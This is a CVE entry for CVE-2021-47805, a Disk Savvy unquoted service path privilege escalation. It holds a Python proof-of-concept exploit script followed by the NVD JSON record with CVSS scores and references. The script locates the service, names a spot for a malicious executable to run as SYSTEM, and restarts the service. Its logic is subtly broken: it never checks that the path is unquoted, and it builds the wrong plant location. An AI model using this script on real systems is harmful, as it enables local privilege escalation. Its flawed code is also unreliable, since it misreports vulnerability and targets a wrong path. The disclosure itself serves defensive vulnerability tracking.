CVE-2021-47805

# CVE-2021-47805 PoC - Unquoted Service Path in Disk Savvy # This script demonstrates how to exploit the unquoted service path vulnerability # to escalate privileges to LocalSystem import os import sys import subprocess import shutil def check_vulnerability(): """Check if Disk Savvy service is installed and has unquoted path""" try: result = subprocess.run( ['sc', 'qc', 'DiskSavvy'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: path_line = [l for l in result.stdout.split('\n') if 'BINARY_PATH' in l] if path_line: return True, path_line[0] except: pass return False, None def exploit_unquoted_path(): """Exploit unquoted service path by placing malicious executable""" # Identify the unquoted path in Disk Savvy service configuration # Typical vulnerable path: C:\Program Files\Disk Savvy\bin\DiskSavvy.exe # Split path by spaces to find potential injection points base_path = "C:\\Program Files\\Disk Savvy\\bin" # Create malicious executable name based on path segments # If path is unquoted, Windows will try to execute first word before space malicious_exe = os.path.join(base_path.split()[0], "Program.exe") # In real attack, this would be the actual malicious payload # For demonstration, we'll show the concept print(f"[*] Malicious executable should be placed at: {malicious_exe}") print("[*] When DiskSavvy service restarts, it will execute this file as SYSTEM") # Trigger service restart (requires administrator privileges for actual exploitation) try: subprocess.run(['sc', 'stop', 'DiskSavvy'], capture_output=True) subprocess.run(['sc', 'start', 'DiskSavvy'], capture_output=True) print("[+] Service restart triggered") except Exception as e: print(f"[-] Failed to restart service: {e}") if __name__ == "__main__": print("CVE-2021-47805 - Disk Savvy Unquoted Service Path Exploitation") print("=" * 60) is_vulnerable, path_info = check_vulnerability() if is_vulnerable: print(f"[+] Disk Savvy service found with path: {path_info}") exploit_unquoted_path() else: print("[-] Disk Savvy service not found or not vulnerable")

{"cve": {"id": "CVE-2021-47805", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:25.083", "lastModified": "2026-01-21T22:23:23.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Disk Savvy 13.6.14 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in service binaries to inject malicious executables that will be run with elevated LocalSystem privileges."}, {"lang": "es", "value": "Disk Savvy 13.6.14 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio de Windows que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas en los binarios del servicio para inyectar ejecutables maliciosos que se ejecutarán con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexense:disksavvy:13.6.14:*:*:*:-:*:*:*", "matchCriteriaId": "CF572074-8379-4DEB-B9B0-A4D0326126A6"}]}]}], "references": [{"url": "https://www.disksavvy.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50024", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/disk-savvy-multiple-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}